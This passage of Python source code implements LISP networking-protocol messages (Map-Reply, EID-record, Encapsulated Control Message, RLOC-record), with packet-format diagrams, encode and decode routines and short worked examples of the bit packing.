xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
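    #
    # Worked example (illustrative): an xTR-ID of
    # 0x00112233445566778899aabbccddeeff is split into an upper half of
    # 0x0011223344556677 and a lower half of 0x8899aabbccddeeff; each half
    # is run through byte_swap_64() before packing, and decode_xtr_id()
    # reverses the process, reading the xTR-ID from the last 16 bytes of
    # the packet.
    #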
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
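    #
    # Worked example (illustrative): a Map-Reply with the RLOC-probe bit
    # set, hop-count 0, and one EID-record encodes its first long-word as
    # (LISP_MAP_REPLY << 28) | 0x08000000 | (0 << 8) | 1 = 0x28000001.
    #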
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire set of locator-set records is encrypted with the
# chacha cipher.
#
# And this is for an EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
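    #
    # Worked examples (illustrative): record_ttl 1440 prints as "24 hours"
    # and stores as 86400 seconds, record_ttl 90 prints as "90 mins" and
    # stores as 5400 seconds, and record_ttl 0x80000005 (high-order bit
    # set) prints and stores as 5 seconds.
    #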
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
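    #
    # Worked example (illustrative): the ACT/A/I field packs as
    # (action << 13) | 0x1000 | 0x800, so an authoritative, ddt-incomplete
    # EID-record with action LISP_DDT_ACTION_MS_ACK (2) encodes the 16-bit
    # field as 0x5800. sig_mv carries the signature-count in its high 4
    # bits and the map-version in its low 12 bits.
    #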
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))
    #enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
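    #
    # Worked example (illustrative): for a 100-byte inner LISP control
    # message, udp_length is 108 (payload plus 8-byte UDP header), the IPv4
    # total-length field is 128 (it includes the 20-byte IPv4 header), and
    # the IPv6 payload-length field stays at 108 (the 40-byte IPv6 header
    # is not counted).
    #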
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, the 'kid' field is a key-id and indicates that
# the value fields in the JSON string are encrypted with the encryption key
# associated with key-id 'kid'.
#
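# lisp_example_json_lcaf_kid_byte
#
# Illustrative sketch only (this function is not called anywhere in this
# file): it shows how the kid/E/B byte of a Type=14 JSON LCAF is formed when
# the JSON values are encrypted, mirroring encode_json() and the E-bit test
# (rsvd2 & 0x02) in decode_lcaf() below. For example, key-id 1 yields
# (1 << 5) | 0x02 = 0x22.
#
def lisp_example_json_lcaf_kid_byte(json_key_id, encrypted):
    kid = 0
    if (encrypted): kid = (json_key_id << 5) | 0x02
    return(kid)
#enddef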
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
